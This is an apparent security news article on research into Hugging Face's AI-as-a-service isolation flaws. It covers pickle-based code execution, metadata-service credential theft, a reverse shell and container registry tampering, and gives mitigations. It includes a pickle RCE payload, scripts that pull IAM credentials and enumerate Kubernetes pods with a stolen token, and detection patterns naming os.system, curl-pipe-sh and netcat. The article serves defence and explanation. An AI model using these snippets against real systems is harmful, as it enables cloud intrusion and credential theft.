New AI-as-a-Service Flaw Enables Hackers to Escalate Privileges

Hugging Face has become the go‑to hub for training, storing, and sharing machine‑learning models. It lets developers experiment with ready‑made models and datasets without the overhead of local installations. The platform’s popularity means it sits at the heart of the AI supply chain, a fact that makes it a prime target for adversaries.

The Anatomy of an AI‑as‑a‑Service Attack

At its core, an AI application is a trio of components: the model, the application code that drives it, and the inference infrastructure that runs the model. Each of these layers can be a vector for attack. Adversarial inputs can warp a model’s behavior, vulnerable application code can be exploited directly, and malicious models can slip into production environments.

How Attackers Slip In

Researchers discovered that malicious actors can exploit flaws in the inference process, specifically by loading untrusted pickle files. Pickle, a Python serialization format, is notorious for enabling remote code execution when an attacker controls the payload. By uploading a crafted pickle model, an attacker can trigger arbitrary code execution inside the inference environment.
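As a minimal illustration of why untrusted pickle data is dangerous (a generic sketch, not the researchers’ actual payload), an object can define __reduce__ so that merely deserializing it runs an attacker-chosen command:

```python
import os
import pickle


class MaliciousPayload:
    # pickle consults __reduce__ to learn how to rebuild the object;
    # returning (os.system, (...,)) makes the *loader* run the command.
    def __reduce__(self):
        return (os.system, ("echo code executed during unpickling",))


blob = pickle.dumps(MaliciousPayload())

# Whoever unpickles this blob executes the embedded command, which is why
# loading an untrusted pickle file amounts to running untrusted code.
pickle.loads(blob)
```

The payload does not even need the original class to exist on the loading side; the pickle stream simply references os.system and its argument, so any environment that deserializes the file is exposed.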

Supply‑Chain Risk Amplified by CI/CD

Once a malicious model is in place, the danger extends beyond the inference sandbox. Attackers can inject harmful code into the continuous integration and continuous deployment pipeline that feeds AI applications. This creates a supply‑chain attack that compromises not only the target model but potentially every downstream application that relies on shared resources.

Researchers Uncover Isolation Flaws

Wiz, a security firm focused on cloud infrastructure, conducted a deep dive into Hugging Face’s isolation mechanisms. They tested three flagship offerings: the Inference API, which allows experimentation without local setups; Inference Endpoints, a managed production deployment service; and Spaces, a collaborative app hosting platform.

Custom Model Uploads: A Double‑Edged Sword

All three services let users upload custom models. While this flexibility is a boon for developers, it also opens the door for attackers. The team wondered: could a malicious model be uploaded and executed within the Inference API, thereby compromising the underlying infrastructure?

The Pickle Test

To answer that, they crafted a malicious PyTorch model serialized in pickle format. Hugging Face scans uploaded pickle files and flags dangerous ones as unsafe, yet it still permits inference on flagged models because the format remains in wide use across the community. The researchers uploaded their test model and observed that the Inference API executed the embedded code. The execution environment was not fully sandboxed, meaning the code ran with the same privileges as the inference process.
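Such scanning typically inspects the pickle opcode stream statically rather than executing it. The toy sketch below shows the general idea (an illustrative denylist, not Hugging Face’s actual scanner) and also hints at the limitation: detection alone does not stop a flagged model from being loaded.

```python
import pickletools

# Callables whose appearance in a pickle stream is a strong abuse signal.
# Illustrative denylist only; real scanners use far broader rules.
SUSPICIOUS = {
    ("os", "system"),
    ("posix", "system"),
    ("subprocess", "Popen"),
    ("builtins", "eval"),
    ("builtins", "exec"),
}


def scan_pickle(path):
    """Walk the opcode stream without executing it and flag dangerous imports."""
    with open(path, "rb") as f:
        data = f.read()
    ops = list(pickletools.genops(data))
    findings = []
    for i, (opcode, arg, _pos) in enumerate(ops):
        if opcode.name == "GLOBAL":
            # GLOBAL carries "module name" as one space-separated string.
            module, _, name = arg.partition(" ")
            if (module, name) in SUSPICIOUS:
                findings.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            # STACK_GLOBAL resolves the two most recently pushed strings.
            strings = [a for _op, a, _ in ops[:i] if isinstance(a, str)][-2:]
            if len(strings) == 2 and tuple(strings) in SUSPICIOUS:
                findings.append(".".join(strings))
    return findings
```

Static checks of this kind can be evaded with obfuscation, which is one reason that treating flagged models as merely "unsafe but runnable" leaves a gap.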

From Model to Kubernetes: A Stealthy Path

Exploiting the RCE in the Inference API gave attackers a foothold inside a Kubernetes pod on Amazon EKS. By abusing the pod’s ability to query the instance metadata service (IMDS) and a default insecure configuration that exposes node identity, the attacker retrieved a bearer token with node‑level privileges.
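The metadata service sits at a fixed link-local address, so any workload that can reach it can ask for the credentials of the node’s IAM role. A minimal sketch of the kind of request involved (IMDSv1-style, with no Hugging Face specifics assumed):

```python
import json
import urllib.request

# The instance metadata service is reachable at this link-local address
# from inside an EC2 instance, and from pods unless access is blocked.
IMDS = "http://169.254.169.254/latest/meta-data"


def fetch(path):
    with urllib.request.urlopen(f"{IMDS}/{path}", timeout=2) as resp:
        return resp.read().decode()


# 1. Discover which IAM role is attached to the underlying node.
role_name = fetch("iam/security-credentials/").strip()

# 2. Retrieve temporary credentials for that role; whoever holds them can
#    act with the node's AWS permissions, including its EKS node identity.
creds = json.loads(fetch(f"iam/security-credentials/{role_name}"))
print(creds["AccessKeyId"], creds["Expiration"])
```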

Gaining a Reverse Shell

Armed with the token, the attacker launched a reverse shell from the inference environment, effectively bridging the gap between the model’s sandbox and the cluster’s control plane. This shell allowed enumeration of pod information and extraction of secrets stored in environment variables or mounted volumes.
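With such a token, the Kubernetes API can be queried over its plain REST interface. The sketch below illustrates the kind of enumeration this enables; the API server address and token are placeholders, and this is not the researchers’ actual tooling:

```python
import json
import ssl
import urllib.request

# Hypothetical values: the cluster's API server and a stolen bearer token.
API_SERVER = "https://10.100.0.1:443"
TOKEN = "<token-derived-from-the-node-identity>"

# Certificate verification is disabled only to keep the sketch short; real
# tooling would pin the cluster CA bundle mounted into the pod.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def k8s_get(path):
    req = urllib.request.Request(
        f"{API_SERVER}{path}",
        headers={"Authorization": f"Bearer {TOKEN}"},
    )
    with urllib.request.urlopen(req, context=ctx) as resp:
        return json.load(resp)


# List the pods the token is authorized to see, a first step toward
# harvesting secrets from environment variables and mounted volumes.
for item in k8s_get("/api/v1/pods").get("items", []):
    meta = item["metadata"]
    print(meta["namespace"], meta["name"])
```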

Lateral Movement and Container Registry Compromise

With node privileges in hand, the attacker moved laterally within the cluster and took advantage of a vulnerability in Hugging Face Spaces. They crafted a malicious Dockerfile that executed harmful commands during the image build process. The compromised image was pushed to a user‑shared internal container registry. Because access controls were insufficient, the attacker could overwrite other users’ container images, potentially sabotaging production deployments.

Mitigating the Threat

Security teams should treat model ingestion as an entry point for threat actors. Implementing strict content validation, such as rejecting pickle formats or sandboxing them in a dedicated runtime, can stop malicious payloads from reaching the inference engine. Additionally, blocking pod access to the instance metadata service unless it is absolutely necessary, for example by enforcing IMDSv2 with a hop limit of 1, will reduce the risk of credential theft.
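On the model side, one practical step is to load only tensor data and never execute code from the file. A brief sketch, assuming a recent PyTorch and the optional safetensors package (file names are placeholders):

```python
import torch

# weights_only=True restricts unpickling to a safelist of tensor-related
# types, so arbitrary callables embedded in the file cannot run on load
# (available since PyTorch 1.13 and the default in recent releases).
state_dict = torch.load("model.bin", weights_only=True)

# Better still, prefer the safetensors format, which stores raw tensors
# plus metadata and never executes code when loading.
try:
    from safetensors.torch import load_file
    state_dict = load_file("model.safetensors")
except ImportError:
    pass  # safetensors not installed; the restricted loader above still applies
```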

Hardening the Supply Chain

Automated scanning of Dockerfiles and image layers for suspicious commands should become a standard step before pushing to a registry. Coupled with immutable deployment practices and fine‑grained access controls, these measures can prevent attackers from tampering with downstream applications.
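Dedicated tools such as Hadolint (for Dockerfiles) or Trivy (for image layers) cover this ground, but even a lightweight CI check can catch obvious build-time abuse. A toy heuristic sketch, with illustrative patterns only:

```python
import re
import sys

# Patterns that often indicate code being fetched and executed at build time.
# Illustrative only; tune the list for your environment.
SUSPICIOUS_PATTERNS = [
    r"curl\s+[^|]*\|\s*(sh|bash)",   # curl ... | sh
    r"wget\s+[^|]*\|\s*(sh|bash)",   # wget ... | sh
    r"\bnc\b.*\s-e\s",               # netcat spawning a shell
    r"base64\s+(-d|--decode)",       # decoding an embedded payload
]


def scan_dockerfile(path):
    findings = []
    with open(path) as f:
        for lineno, line in enumerate(f, 1):
            if not line.lstrip().upper().startswith("RUN "):
                continue
            for pattern in SUSPICIOUS_PATTERNS:
                if re.search(pattern, line):
                    findings.append((lineno, line.strip()))
    return findings


if __name__ == "__main__":
    hits = scan_dockerfile(sys.argv[1] if len(sys.argv) > 1 else "Dockerfile")
    for lineno, line in hits:
        print(f"Dockerfile:{lineno}: suspicious build step: {line}")
    sys.exit(1 if hits else 0)  # a non-zero exit fails the CI job
```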

What This Means for the AI Supply Chain

The findings highlight a broader issue: the convenience of AI‑as‑a‑service platforms can inadvertently lower security baselines. As more organizations rely on shared compute resources, the potential impact of a single compromised model magnifies. The attack surface now extends from the model layer to the orchestration layer and beyond.

Looking Ahead

Future AI platforms must embed security into every layer of the stack, from model validation to infrastructure isolation. By treating every uploaded artifact as a potential threat and enforcing least‑privilege principles at the container and cluster levels, developers can harness the power of shared AI services without exposing themselves to the kind of privilege escalation demonstrated in recent research. The next wave of AI deployment will be defined not just by model accuracy but by the robustness of the security controls that protect the entire supply chain.
